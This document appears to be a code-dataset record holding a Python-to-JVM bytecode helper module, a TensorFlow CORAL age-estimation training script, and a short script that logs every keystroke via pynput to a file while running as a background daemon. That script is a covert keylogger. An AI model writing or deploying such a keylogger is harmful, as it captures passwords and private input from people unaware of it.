context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-5": "from ...java import opcodes as JavaOpcodes\n\nfrom .primitives import ICONST_val\n\n\n##########################################################################\n# Common Java operations\n##########################################################################\n\nclass New:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW(self.classname),\n JavaOpcodes.DUP()\n )\n\n\nclass Init:\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKESPECIAL(\n self.classname,\n '<init>',\n args=self.args,\n returns='V'\n ),\n )\n\n\nclass Yield:\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.yield_point),\n JavaOpcodes.INVOKEVIRTUAL(\n 'org/python/types/Generator',\n 'yield',\n args=['Ljava/util/Map;', 'I'],\n returns='V'\n ),\n # \"yield\" by returning from the generator method.\n JavaOpcodes.ARETURN()\n )\n\n\n##########################################################################\n# Java types and their operations\n##########################################################################\n\nclass Array:\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.size),\n JavaOpcodes.ANEWARRAY(self.classname),\n )\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(\n JavaOpcodes.DUP(),\n ICONST_val(i),\n self.fill,\n JavaOpcodes.AASTORE(),\n )\n\n\nclass List:\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP(),\n )\n\n if self.size:\n context.add_opcodes(\n ICONST_val(self.size),\n Init('java/util/ArrayList', 'I')\n )\n else:\n context.add_opcodes(\n Init('java/util/ArrayList')\n )\n\n class add:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List',\n 'add',\n args=['Ljava/lang/Object;'],\n returns='Z'\n ),\n JavaOpcodes.POP(),\n )\n\n\nclass Map:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(),\n Init('java/util/HashMap')\n )\n\n class get:\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.key),\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'get',\n args=['Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n )\n )\n\n class put:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'put',\n args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n ),\n JavaOpcodes.POP()\n )\n\n class putAll:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'putAll',\n args=['Ljava/util/Map;'],\n returns='V'\n ),\n )\n\n\nclass Class:\n class forName:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC(\n 'java/lang/Class',\n 'forName',\n args=['Ljava/lang/String;'],\n returns='Ljava/lang/Class;'\n ),\n )\n\n\nclass THROW:\n # Raise an exception of given type with given arguments\n # Example:\n # THROW(\n # 'org/python/exceptions/AttributeError',\n # ['Ljava/lang/String;', JavaOpcodes.LDC_W(\"Invalid attribute\")],\n # )\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(\n New(self.exception_class),\n *self.exc_arg_values\n )\n context.add_opcodes(\n Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW(),\n )\n",
"step-ids": [
12,
15,
16,
18,
23
]
}
|
[
12,
15,
16,
18,
23
] |
from pynput.keyboard import Listener
import logging
import daemon
import socket
import thread
logging.basicConfig(format="%(asctime)s:%(message)s")
file_logger = logging.FileHandler("/home/user0308/logger.log", "a")
logger = logging.getLogger()
logger.addHandler(file_logger)
logger.setLevel(logging.DEBUG)
def press(key):
logging.info(key)
def work():
with Listener(on_press = press) as listener:
listener.join()
with daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):
work()
|
normal
|
{
"blob_id": "3dc2d9a5e37ce1f546c0478de5a0bb777238ad00",
"index": 4306,
"step-1": "<mask token>\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\n<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(format='%(asctime)s:%(message)s')\n<mask token>\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-3": "<mask token>\nlogging.basicConfig(format='%(asctime)s:%(message)s')\nfile_logger = logging.FileHandler('/home/user0308/logger.log', 'a')\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-4": "from pynput.keyboard import Listener\nimport logging\nimport daemon\nimport socket\nimport thread\nlogging.basicConfig(format='%(asctime)s:%(message)s')\nfile_logger = logging.FileHandler('/home/user0308/logger.log', 'a')\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\n\ndef work():\n with Listener(on_press=press) as listener:\n listener.join()\n\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n work()\n",
"step-5": "from pynput.keyboard import Listener\nimport logging\nimport daemon\nimport socket\nimport thread\n\nlogging.basicConfig(format=\"%(asctime)s:%(message)s\")\nfile_logger = logging.FileHandler(\"/home/user0308/logger.log\", \"a\")\nlogger = logging.getLogger()\nlogger.addHandler(file_logger)\nlogger.setLevel(logging.DEBUG)\n\n\ndef press(key):\n logging.info(key)\n\ndef work():\n\twith Listener(on_press = press) as listener:\n \tlistener.join()\n\nwith daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):\n\t\twork()\t\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
# https://github.com/Raschka-research-group/coral-cnn/tree/master/model-code/resnet34
from absl import flags, app
from Rank_consistent_model_fix import *
from Rank_consistent_model import *
from random import shuffle, random
import tensorflow as tf
import numpy as np
# import cv2
import os
import sys
import datetime
flags.DEFINE_string('img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')
flags.DEFINE_string('txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt', 'Text (with label information) directory')
flags.DEFINE_string('val_img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Validate image path')
flags.DEFINE_string('val_txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt', 'Validate text path')
flags.DEFINE_string("val_txt_path_2", "D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt", "Validataion text path")
flags.DEFINE_integer('img_size', 128, 'Image size')
flags.DEFINE_integer('ch', 3, 'Image channels')
flags.DEFINE_integer('batch_size', 256, 'Train Batch size')
flags.DEFINE_integer("val_batch_size", 128, "Validation Batch size")
flags.DEFINE_integer("val_batch_size_2", 128, "Validation2 batch size")
flags.DEFINE_integer('num_classes', 48, 'Number of classes')
flags.DEFINE_integer('epochs', 5000, 'Total epochs of training')
flags.DEFINE_float("lr", 5e-5, "Learning rate")
flags.DEFINE_string('weights', "/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5", '')
flags.DEFINE_bool('train', True, 'True or False')
flags.DEFINE_bool('pre_checkpoint', False, 'True or False')
flags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')
flags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')
flags.DEFINE_string("graphs", "", "")
flags.DEFINE_integer('n_test', 10000, 'Number of test images')
flags.DEFINE_string('test_txt', '', 'Test text(label) path')
flags.DEFINE_string('test_img', '', 'Test images path')
flags.DEFINE_string("output_loss_txt", "/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt", "")
FLAGS = flags.FLAGS
FLAGS(sys.argv)
optimizer = tf.keras.optimizers.Adam(FLAGS.lr,beta_1=0.9, beta_2=0.99)
def _func(filename, label):
image_string = tf.io.read_file(filename)
decode_image = tf.image.decode_jpeg(image_string, channels=3)
decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.
#decode_image = tf.image.random_crop(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8, 3])
if random() > 0.5:
decode_image = tf.image.flip_left_right(decode_image)
#decode_image = tf.image.per_image_standardization(decode_image)
label = label - 16
one_hot = tf.one_hot(label, FLAGS.num_classes)
return decode_image, one_hot, label
def val_func(name, label):
image_string = tf.io.read_file(name)
decode_image = tf.image.decode_jpeg(image_string, channels=3)
decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.
#decode_image = tf.image.per_image_standardization(decode_image)
label = int(label) - 16
one_hot = tf.one_hot(label, FLAGS.num_classes)
return decode_image, one_hot
#@tf.function
def run_model(model, images):
logits, probs = model(images, training=True)
return logits, probs
@tf.function
def train_step(model, images, levels, imp):
with tf.GradientTape() as tape:
logits, probs = run_model(model, images)
#total_loss = (-tf.reduce_sum((tf.nn.log_softmax(logits, axis=2)[:,:,1]*levels + tf.nn.log_softmax(logits, axis=2)[:,:,0]*(1-levels))*imp, 1))
# total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + tf.math.log(1. - tf.nn.sigmoid(logits))*(1-levels))*imp, 1))
total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + (tf.math.log_sigmoid(logits) - logits)*(1-levels))*imp, 1))
#total_loss = -tf.reduce_sum((tf.math.log(tf.nn.softmax(logits, 2)[:, :, 1] + 1e-7) * levels \
# + tf.math.log(tf.nn.softmax(logits, 2)[:, :, 0] + 1e-7) * (1 - levels)) * imp, 1)
total_loss = tf.reduce_mean(total_loss)
gradients = tape.gradient(total_loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
return total_loss
def task_importance_weights(data):
label = np.array(data).astype(np.float32)
num_examples = label.size
y = np.unique(label)
m = np.zeros(label.shape)
for i, t in enumerate(np.arange(np.min(y), np.max(y))):
m_k = np.max([label[label > t].size,
num_examples - label[label > t].size])
#print(m_k)
m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)
m[i] = tf.sqrt(m_k)
# m[i] = float(m_k)**(0.5)
max_ = np.max(m)
imp = tf.cast(m / max_, tf.float32)
#print(imp)
return imp
@tf.function
def test_MAE(model, images, labels):
logits, probs = model(images, training=False)
predict = probs > 0.5
predict = tf.cast(predict, tf.float32)
pre_age = tf.reduce_sum(predict, 1)
grd_age = tf.argmax(labels, 1) + 1
grd_age = tf.cast(grd_age, tf.float32)
AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))
return AE
def make_levels(labels):
levels = []
for i in range(FLAGS.batch_size):
l = [1] * (labels[i].numpy()) + [0]*(FLAGS.num_classes - 1 - labels[i].numpy())
l = tf.cast(l, tf.float32)
levels.append(l)
return tf.convert_to_tensor(levels, tf.float32)
def main(argv=None):
# train_model = resnet_type1(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, 3), NUM_CLASSES=FLAGS.num_classes)
train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, FLAGS.ch), include_top=False,
batch_size=FLAGS.batch_size, weight_path=FLAGS.weights, weights='imagenet')
regularizer = tf.keras.regularizers.l2(0.000005)
initializer = tf.keras.initializers.glorot_normal()
for layer in train_model.layers:
for attr in ['kernel_regularizer']:
if hasattr(layer, attr):
setattr(layer, attr, regularizer)
# for attr_ in ["kernel_initializer"]:
# if hasattr(layer, attr_):
# setattr(layer, attr_, initializer)
x = train_model.output
avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)
# avgpool = tf.reshape(avgpool, [avgpool.shape[0], -1])
# fc = tf.keras.layers.Dense(1, use_bias=False)(avgpool)
# logits = Linear(NUM_CLASSES - 1)(fc)
logits = tf.keras.layers.Dense(FLAGS.num_classes-1, use_bias=False)(avgpool)
logits = Linear(FLAGS.num_classes - 1)(logits)
probs = tf.nn.sigmoid(logits)
train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits, probs])
train_model.summary()
#for m in train_model.layers:
# if isinstance(m, tf.keras.layers.Conv2D):
# a = m.output_mask
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, (2. / n)**.5)
# elif isinstance(m, tf.keras.layers.BatchNormalization):
# m.get_weights
# m.weight.data.fill_(1)
# m.bias.data.zero_()
if FLAGS.pre_checkpoint is True:
ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)
ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.pre_checkpoint_path, max_to_keep=5)
# if a checkpoint exists, restore the latest checkpoint.
if ckpt_manager.latest_checkpoint:
print(ckpt_manager.latest_checkpoint)
ckpt.restore(ckpt_manager.latest_checkpoint)
print ('Latest checkpoint restored!!')
if FLAGS.train == True:
data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0, usecols=0)
data_name = [FLAGS.img_path + data_name_ for data_name_ in data_name]
data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0, usecols=1)
imp = task_importance_weights(data_label-16)
imp = imp[0:FLAGS.num_classes-1]
val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100', skiprows=0, usecols=[0, 1, 2, 3])
print(len(val_data_name))
WM_img, WM_age = [], []
WF_img, WF_age = [], []
BM_img, BM_age = [], []
BF_img, BF_age = [], []
for i in range(len(val_data_name)):
if val_data_name[i][2] == "M" and val_data_name[i][3] == "W":
WM_img.append(FLAGS.val_img_path + val_data_name[i][0])
WM_age.append(val_data_name[i][1])
if val_data_name[i][2] == "F" and val_data_name[i][3] == "W":
WF_img.append(FLAGS.val_img_path + val_data_name[i][0])
WF_age.append(val_data_name[i][1])
if val_data_name[i][2] == "M" and val_data_name[i][3] == "B":
BM_img.append(FLAGS.val_img_path + val_data_name[i][0])
BM_age.append(val_data_name[i][1])
if val_data_name[i][2] == "F" and val_data_name[i][3] == "B":
BF_img.append(FLAGS.val_img_path + val_data_name[i][0])
BF_age.append(val_data_name[i][1])
print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))
WM_img, WM_age = np.array(WM_img), np.array(WM_age)
WF_img, WF_age = np.array(WF_img), np.array(WF_age)
BM_img, BM_age = np.array(BM_img), np.array(BM_age)
BF_img, BF_age = np.array(BF_img), np.array(BF_age)
all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age], [BF_img, BF_age]]
batch_idx = len(data_label) // FLAGS.batch_size
#current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
#train_log_dir = FLAGS.graphs + current_time + '/train'
#val_log_dir = FLAGS.graphs + current_time + '/val'
#train_summary_writer = tf.summary.create_file_writer(train_log_dir)
#val_summary_writer = tf.summary.create_file_writer(val_log_dir)
loss_f = open(FLAGS.output_loss_txt, "w")
count = 0
for epoch in range(FLAGS.epochs):
A = list(zip(data_name, data_label))
shuffle(A)
data_name, data_label = zip(*A)
data_name = np.array(data_name)
data_label = np.array(data_label)
data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))
data_generator = data_generator.shuffle(len(data_name))
data_generator = data_generator.map(_func)
data_generator = data_generator.batch(FLAGS.batch_size)
data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)
it = iter(data_generator)
#imp = task_importance_weights(data_label)
#imp = imp[0:FLAGS.num_classes-1]
for step in range(batch_idx):
batch_images, batch_labels, age = next(it)
levels = make_levels(age)
total_loss = train_step(train_model, batch_images, levels, imp)
#with val_summary_writer.as_default():
# tf.summary.scalar(u'total loss', loss, step=count)
if count % 10 == 0:
#MAE = test_MAE(train_model, batch_images, batch_labels, levels)
print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, step + 1, batch_idx, total_loss))
if count % 100 == 0:
test_list = ["WM", "WF", "BM", "BF"]
for j in range(len(all_val_list)):
val_img, val_lab = all_val_list[j]
val_data_generator = tf.data.Dataset.from_tensor_slices((val_img, val_lab))
val_data_generator = val_data_generator.map(val_func)
val_data_generator = val_data_generator.batch(1)
val_data_generator = val_data_generator.prefetch(tf.data.experimental.AUTOTUNE)
val_idx = len(val_img) // 1
val_it = iter(val_data_generator)
AE = 0
for i in range(val_idx):
img, lab = next(val_it)
pre_age = test_MAE(train_model, img, lab)
AE += pre_age
print("MAE = {} ({})".format(AE / len(val_img), test_list[j]))
loss_f.write("Epochs: {}, step = {}".format(epoch, count))
loss_f.write(" --> ")
loss_f.write(test_list[j])
loss_f.write(": ")
loss_f.write(str(AE / len(val_img)))
loss_f.write(", ")
loss_f.write("\n")
loss_f.flush()
# print("==========")
# print("[2]MAE = {}".format(MAE))
# print("==========")
# model_dir = FLAGS.save_checkpoint
# folder_name = int((count + 1)/val_idx)
# folder_name_str = "%s/%s" % (model_dir, folder_name)
# if not os.path.isdir(folder_name_str):
# print("Make {} folder to save checkpoint".format(folder_name))
# os.makedirs(folder_name_str)
# ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)
# checkpoint_dir = folder_name_str + "/" + "CORAL_{}_steps.ckpt".format(count)
# ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_dir, 5)
# ckpt_manager.save()
# with val_summary_writer.as_default():
# tf.summary.scalar(u'[2]MAE', MAE, step=count)
count += 1
else:
data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0, usecols=0)
data_name = [FLAGS.test_img + data_name_ for data_name_ in data_name]
data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=0, usecols=1)
data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))
data_generator = data_generator.shuffle(len(data_name))
data_generator = data_generator.map(_func)
data_generator = data_generator.batch(1)
data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)
MAE = 0
it = iter(data_generator)
for i in range(FLAGS.n_test):
image, labels, opp_labels = next(it)
_, probs = train_model(image, training=False)
predict = probs > 0.5
predict = tf.cast(predict, tf.float32)
pre_age = tf.reduce_sum(predict)
age = tf.cast(age, tf.float32)
MAE += tf.reduce_sum(tf.math.abs(grd_age - age))
if i % 1000 == 0:
print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))
print('Total MAE = {}'.format(MAE / FLAGS.n_test))
if __name__ == '__main__':
app.run(main)
|
normal
|
{
"blob_id": "9ffe350ff9a568111620ef7dafef83d341f6f01e",
"index": 9409,
"step-1": "<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\n<mask token>\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n y = 